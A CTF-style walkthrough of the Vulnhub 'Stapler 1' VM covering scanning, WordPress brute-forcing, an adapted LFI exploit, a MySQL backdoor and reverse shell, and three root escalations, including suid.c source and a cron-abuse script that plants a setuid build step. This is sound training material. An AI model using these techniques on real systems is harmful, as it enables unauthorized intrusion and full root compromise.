Stapler 1. Vulnhub’s VM Walkthrough


I’m not dead yet!
VM available at
https://www.vulnhub.com/entry/stapler-1,150/

Starting it off with an nmap scan:

PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Nikto turned up nothing on TCP port 80, so I decided to focus on TCP port 12380.
Running Nikto against that port:

- Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.3.140
+ Target Hostname: 192.168.3.140
+ Target Port: 12380
—————————————————————————
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2016-06-10 23:48:49 (GMT-4)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header ‘dave’ found, with contents: Soemthing doesn’t look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Entry ‘/admin112233/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/blogblog/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 2 entries which should be manually viewed.
+ Hostname ‘192.168.3.140’ does not match certificate’s names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2016-06-10 23:50:27 (GMT-4) (98 seconds)
—————————————————————————
+ 1 host(s) tested

Interesting entries. However, when we try to visit them manually, every directory, file or URL we request on port 12380 comes back with the same page.
[screenshot: burp_detect_400]

Firing up Burp Suite to proxy our web requests gives a clearer view of what is happening: every request is answered with a 400 Bad Request.

A few Google searches point to the usual cause, Apache rejecting a plaintext HTTP request sent to a port that only speaks TLS:
http://serverfault.com/questions/477236/apache-insecure-request-sent-to-secure-port-want-to-redirect

We can also verify it with an amap scan (note the ssl match on the port):

amap v5.4 (www.thc.org/thc-amap) started at 2016-06-11 00:00:26 - APPLICATION MAPPING mode

Protocol on 192.168.3.140:12380/tcp matches http
Protocol on 192.168.3.140:12380/tcp matches http-apache-2
Protocol on 192.168.3.140:12380/tcp matches ntp
Protocol on 192.168.3.140:12380/tcp matches ssl

Unidentified ports: none.

amap v5.4 finished at 2016-06-11 00:00:32

Browsing to https:// instead of http:// (the certificate is self-signed, so expect a browser warning) shows the content of the /blogblog/ directory, which reveals itself to be a WordPress site.

[screenshot: wordpress-detected.png]
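The check above (plain HTTP answered with Apache's 400, HTTPS answering properly) can be automated so you do not have to stare at Burp for every odd port. The script below is an added example of mine, not something from the original post: it looks for the text Apache puts in that 400 page and, if found, reports the port as TLS-only. It assumes curl is installed; the host and port in the usage line are the ones from the post, and the 400 text is Apache's stock wording.

```shell
#!/bin/sh
# Added example (not from the original post): classify a web port as
# plaintext HTTP or TLS-only by looking for Apache's stock 400 body.
# Assumes curl is installed; host/port are arguments.

# Text Apache puts in its 400 page when plaintext HTTP hits an SSL port.
APACHE_PLAIN_ON_SSL="speaking plain HTTP to an SSL-enabled server port"

# Network fetch, isolated in one function so it can be stubbed offline.
# -k: the VM's certificate is self-signed (CN=Red.Initech), so skip
# verification; we only care about the body here.
http_get() {
    curl -s -k --max-time 5 "$1"
}

# Print "https" if the port only speaks TLS, "http" if plaintext works,
# "unknown" if neither answered. Always returns 0; read the printed word.
pick_scheme() {
    host=$1
    port=$2
    body=$(http_get "http://$host:$port/")
    case $body in
        *"$APACHE_PLAIN_ON_SSL"*) echo https; return 0 ;;
    esac
    if [ -n "$body" ]; then
        echo http
        return 0
    fi
    # Plain HTTP got nothing back; some servers just drop the connection
    # instead of answering with a 400, so try TLS before giving up.
    body=$(http_get "https://$host:$port/")
    if [ -n "$body" ]; then
        echo https
    else
        echo unknown
    fi
    return 0
}

# Usage: ./scheme.sh 192.168.3.140 12380   (prints: https)
if [ "$#" -eq 2 ]; then
    pick_scheme "$1" "$2"
fi
```

Once the scheme is known, point Nikto and WPScan at the https:// URL; both tools otherwise happily report 400 pages as "findings".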

Next, we fire up WPScan, which ships with Kali.
We launch a full scan that enumerates all plugins and themes, using the flag --enumerate ap,at (all plugins, all themes).

Interesting output from our wpscan:

[!] The WordPress ‘https://192.168.3.140:12380/blogblog/readme.html’ file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn’t look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.3.140:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.3.140:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.3.140:12380/blogblog/wp-content/uploads/

[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists – v1.0
| Latest version: 1.0 (up to date)
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Readme: https://192.168.3.140:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.3.140:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet
| Latest version: 3.1.11
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 – Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: shortcode-ui – v0.6.2
| Latest version: 0.6.2 (up to date)
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/shortcode-ui/
| Readme: https://192.168.3.140:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] Directory listing is enabled: https://192.168.3.140:12380/blogblog/wp-content/plugins/shortcode-ui/

[+] Name: two-factor
| Latest version: 0.1-dev-20160412
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/two-factor/
| Readme: https://192.168.3.140:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.3.140:12380/blogblog/wp-content/plugins/two-factor/

We can also use WPScan to brute-force user passwords.

[screenshot: john-password-brute-wpscan]

Logging in to WordPress as john:incorrect

[screenshot: john-incorrect-wp-login]

I went ahead and tried to upload a php-reverse-shell by editing the template. I was then faced with some security implementations that prevented me from doing so. Not wanting to waste any more time, I continued investigating the WordPress plugins.

Nice, it seems that one of the plugins, advanced-video-embed-embed-videos-or-playlists 1.0, has an LFI vulnerability:
https://www.exploit-db.com/exploits/39646/ (Python LFI exploit)

We made some changes to the Python script so that it works against an https:// site.
The main changes were:

import ssl
# Python 2.7.9+ verifies certificates by default; the VM's cert is self-signed,
# so swap in a context that skips verification for every urllib2 HTTPS call
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://TARGET-IP:12380/blogblog/" # insert url to wordpress

Now the script no longer dies with an SSL certificate verification error.
The exploit abuses the plugin's ave_publishPost AJAX action: it creates a post whose "thumbnail" is a local file path, and the plugin copies that file into the uploads directory as an image. We point it at wp-config.php because that file holds the MySQL credentials, and from our nmap scan we know MySQL is listening on 3306.

After running the exploit, a new image file appears in the uploads directory that WPScan found to be listable:

[!] Upload directory has directory listing enabled: https://192.168.3.140:12380/blogblog/wp-content/uploads/

Visiting it gives us the name of the image created by the exploit.

curl -k https://path/to/image/created shows the content of the target's wp-config.php, including the MySQL password.
We can then log in to the target's MySQL server (substitute the password from wp-config.php):
mysql -uroot -ppassword -h <TARGET-IP>

Enumerating the database...

[screenshot: wordpress-credentials]

[screenshot: barry-hash-cracked.png]

I decided to crack barry's password hash, hoping to be able to SSH in. Why did I choose barry?

Next, I went for the quick way: creating a backdoor via MySQL to get command execution.

[screenshot: mysql-backdoor-success]

How did I manage to find out the web-directory path?

After verifying that my backdoor works, I proceeded to push myself a Python reverse shell.

[screenshot: reverse-shell-w-python]

Nice.


PRIVILEGE ESCALATION PART 1

I f*cking love privilege escalation, since it was the factor that caused my failure on my OSCP exam.

Discover OS info, kernel version, etc.

www-data@red:/tmp$ uname -ar
uname -ar
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@red:/tmp$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

This information can be leveraged to search for relevant OS/kernel exploits. For Ubuntu 16.04 on kernel 4.4.0-21 that is the double-fdput() bpf(BPF_PROG_LOAD) local root exploit:
https://www.exploit-db.com/exploits/39772/

Download the zip, follow the instructions (it compiles on the target, so gcc has to be there), root. Keep in mind that kernel exploits can hang or reboot the box, so on a real engagement prefer a misconfiguration such as the cron job in Part 2 when one is available.

[screenshot: apache-to-root-kernel-exploit]

[screenshot: root-flag]


PRIVILEGE ESCALATION PART 2

Enumerate enough and you will discover a cron job whose script is world-writable. Let's abuse it.

[screenshot: cron-job-abuse]

The first attempt I made was to create a root-privileged user without a password, so I could "su" to him and r0ot. However, it still prompted me for a password when I attempted to "su". Anywayzzzzzzz, this showed that the cron job abuse idea WORKS.

Next, I created a .c setuid binary. I abused the cron job to gcc it and chmod u+s it, so that I could run it with root's setuid bit set.

[screenshot: cron-job-abuse2.png]

Time to fly.

[screenshot: cronjob-to-root]

content of suid.c

/* compiled and chmod u+s'ed by the root cron job; run it afterwards for a root shell */
#include <unistd.h>

int main(void) {
    setgid(0); setuid(0);               /* the file is setuid root, so become root for real */
    execl("/bin/sh", "sh", (char *)0);  /* argv must be NULL-terminated */
    return 1;                           /* only reached if execl fails */
}
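Here is the cron part of that procedure as an added shell example of my own (the post only shows screenshots): first list cron-related files that a low-privileged user can write to, then append a step to the chosen script that builds suid.c and marks the result setuid root on the next cron run. Assumptions: the cron entry runs as root, gcc is on the box (the post relies on that too), and you pass the script, source and output paths yourself; no path from this VM is hard-coded.

```shell
#!/bin/sh
# Added example (not from the original post): abuse a world-writable
# script executed by root's cron to build suid.c and set the setuid bit.
# Assumptions: cron runs the script as root; gcc is installed on the box.

# List regular files under the given paths that anyone can write to.
# /etc/cron* and the scripts those entries call are the usual suspects.
world_writable() {
    find "$@" -type f -perm -0002 2>/dev/null
}

# Append a build-and-setuid step to a script that root's cron executes.
# Guarded with -u so repeated cron runs do nothing once it has worked.
plant_suid_step() {
    script=$1       # world-writable script run by root's cron
    src=$2          # suid.c from the post
    out=$3          # where the root-owned setuid binary should land
    cat >>"$script" <<EOF
# begin setuid build step (added)
if [ ! -u "$out" ]; then
    gcc -o "$out" "$src" && chown root:root "$out" && chmod 4755 "$out"
fi
# end setuid build step
EOF
}

# Poll until OUT exists with the setuid bit (return 0) or give up (1).
# Cron granularity is one minute; the default polls for ten minutes.
SUID_POLL_SECS=${SUID_POLL_SECS:-10}
wait_for_suid() {
    out=$1
    tries=${2:-60}
    while [ "$tries" -gt 0 ]; do
        [ -u "$out" ] && return 0
        sleep "$SUID_POLL_SECS"
        tries=$((tries - 1))
    done
    return 1
}

# Usage:
#   world_writable /etc/cron* /usr/local/sbin /usr/local/bin
#   plant_suid_step /path/to/writable-cron-script.sh /tmp/suid.c /tmp/rootsh
#   wait_for_suid /tmp/rootsh && /tmp/rootsh
```

Check the cron entry itself (cat /etc/cron.d/* and crontab -l as root is not possible, but the /etc/cron.d files are world-readable) to confirm it really runs as root and how often; otherwise you may wait for a run that never comes or get a binary owned by a non-root user.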


PRIVILEGE ESCALATION PART 3

ls -alhR /home/

It should display a curious file, .sudo_as_admin_successful, in /home/peter. (Ubuntu's sudo creates that file the first time a member of the admin/sudo group runs sudo successfully, so it is a strong hint that peter can sudo.)
Proceed to investigate the user peter in /etc/group.

It appears that he has more privileges than other users.. let's snipe him out!

Initially I wanted to find every file that has "peter" in it.
The command find / -name *peter* 2>/dev/null doesn't work as I wanted (Any tips on using the find command?)

grep -r "peter" 2>/dev/null will display a sh*t ton of output, but at some point we will be able to see it...
[screenshot: peter-ssh-pass]
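As an added example of mine (not the post's commands), here are the two searches from this section in a form that behaves: the find pattern is quoted, because an unquoted *peter* gets expanded by the shell against the current directory before find ever sees it, and the grep skips binary files and can be narrowed to credential-looking lines so the output is a short list rather than a wall of text. The paths in the usage comment are suggestions; run them against whatever the target has.

```shell
#!/bin/sh
# Added example (not from the original post): name and content searches
# for a user, done without shell-glob surprises or binary noise.

# Files or directories whose name contains NAME (case-insensitive).
# The pattern is quoted so find, not the shell, expands the wildcard.
files_named_like() {
    name=$1; shift
    find "$@" -iname "*${name}*" 2>/dev/null
}

# Readable text files mentioning NAME. -I skips binaries, -l prints only
# file names, -i ignores case.
files_mentioning() {
    name=$1; shift
    grep -rIil -e "$name" -- "$@" 2>/dev/null
}

# Lines where NAME appears together with a password-ish word, in either
# order, with file name and line number so you can open the file.
credential_lines() {
    name=$1; shift
    grep -rIinE -e "(${name}.*(pass|secret|pw))|((pass|secret|pw).*${name})" -- "$@" 2>/dev/null
}

# Usage on the target (root not required; unreadable paths are skipped):
#   files_named_like peter /
#   files_mentioning peter /etc /home /var /opt
#   credential_lines peter /etc /home /var /opt
```

If credential_lines comes back empty, fall back to files_mentioning and read the shorter list by hand; the credential pattern is deliberately narrow.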

Proceed to SSH in as peter with his password, then sudo to root.

[screenshot: peter-to-root]

DONE!


Possible users I came up with throughout my enumeration/exploitation:
I WAS REALLY SAD I COULDN'T SSH IN WITH BARRY

harry
zoe
fred
kathy
barry
dave
john
smith
elly
peter
heather
garry
scott
tim
vicki
pam
simon



Reference used: https://download.vulnhub.com/stapler/slides.pdf
Let me know if at any point you are unable to follow through!

Stay safe!

-9emin1